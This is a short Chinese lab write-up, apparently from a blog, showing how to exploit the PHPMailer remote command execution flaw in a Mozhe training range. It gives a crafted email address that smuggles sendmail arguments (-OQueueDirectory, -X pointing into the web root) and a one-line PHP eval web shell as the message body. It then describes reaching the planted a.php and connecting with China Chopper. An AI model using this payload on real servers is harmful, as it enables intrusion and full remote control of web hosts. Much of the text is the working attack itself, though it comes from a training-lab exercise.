墨者 - PHPMailer远程命令执行漏洞溯源

用bp抓包,发现与后台交互的文件

墨者 - PHPMailer远程命令执行漏洞溯源

 

构建email    "aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @ aaa.com   

      message    <?php @eval($_REQUEST[a]);?>

墨者 - PHPMailer远程命令执行漏洞溯源

访问a.php文件,上传成功

墨者 - PHPMailer远程命令执行漏洞溯源

 

菜刀无惧链接

墨者 - PHPMailer远程命令执行漏洞溯源

 

原理参考:https://www.anquanke.com/post/id/85295

                  https://blog.csdn.net/wyvbboy/article/details/53969278

上一篇:php发送邮件


下一篇:PHPMailer不适用于Gmail SMTP